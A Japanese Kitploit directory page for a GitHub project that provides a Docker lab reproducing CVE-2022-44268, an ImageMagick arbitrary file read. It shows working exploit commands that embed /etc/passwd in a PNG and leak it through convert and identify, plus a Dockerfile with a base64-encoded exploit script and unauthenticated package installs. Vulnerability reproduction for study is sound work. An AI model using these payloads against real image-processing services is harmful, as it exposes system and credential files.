Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2022-44268-ImageMagick-Vulnerable-Docker-Environment — CVE-2022-44268 用の脆弱性再現 Docker 環境 | Kitploit
ツール/GitHubGitHub/y1nglamore/cve-2022-44268-imagemagick-vulnerable-docker-environment
脆弱性分析エクスプロイトウェブアプリケーション悪用学習と教育ラボと実践
GitHuby1nglamore/cve-2022-44268-imagemagick-vulnerable-docker-environment

CVE-2022-44268-ImageMagick-Vulnerable-Docker-Environment

CVE-2022-44268 用の脆弱性再現 Docker 環境

リポジトリを見る

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
1023年前未レビュー

CVE-2022-44268 ImageMagick 任意ローカルファイル読み取り

https://www.metabaseq.com/imagemagick-zero-days/

PoC CVE-2022-44268 ImageMagick Arbitrary File Read PoC に基づいて、docker を使用して脆弱性テスト環境を作成しました。

使い方

root@kitploit:~
# get image
docker pull y1nglamore/cve_2022_44268:latest # you can also build from Dockerfile

# run container
docker run --rm -i -t y1nglamore/cve_2022_44268 /bin/bash

その後、コンテナ内に入ることができます。./run.sh FILEPATH を使用すると、imagemagick がファイルを読み取ります。

m1-155000_hh4Qzq

デフォルトでは、./run.sh は /etc/passwd を読み取ります。

m1-155130_56zEuO

または、以下のコマンドを手動で実行することもできます。

root@kitploit:~
pngcrush -text a "profile" "/etc/passwd" 1.png
exiv2 -pS pngout.png
convert pngout.png gopro.png

identify -verbose gopro.png

Dockerfile

root@kitploit:~
FROM ubuntu:20.04

RUN apt update --allow-insecure-repositories
RUN apt-get install pngcrush  -y --allow-unauthenticated
RUN apt-get install imagemagick  -y --allow-unauthenticated
RUN apt-get install  exiftool exiv2 wget -y --allow-unauthenticated
RUN apt-get install xxd -y   --allow-unauthenticated

WORKDIR /root
RUN wget http://cdn2.pic.y1ng.vip/uPic/2023/02/03/m1-145410_1.png -O 1.png
RUN echo 'IyEvYmluL2Jhc2gKCmlmIFsgLXogIiQxIiBdOyB0aGVuCiAgICBmaWxlPSIvZXRjL3Bhc3N3ZCIKZWxzZQogICAgZmlsZT0iJDEiCmZpCgpwbmdjcnVzaCAtdGV4dCBhICJwcm9maWxlIiAiJGZpbGUiIDEucG5nIApleGl2MiAtcFMgcG5nb3V0LnBuZyAKY29udmVydCBwbmdvdXQucG5nIGdvcHJvLnBuZyAKCmlkZW50aWZ5IC12ZXJvc2UgZ29wcm8ucG5nIHwgZ3JlcCAtZSAiXlswLTlhLWZdKiQiIHwgIGdyZXAgLiB8IHh4ZCAtciAtcAon | base64 -d > run.sh 
RUN chmod +x run.sh

CMD sleep infinity

参考と謝辞

https://github.com/duc-nt/CVE-2022-44268-ImageMagick-Arbitrary-File-Read-PoC

ツールをダウンロード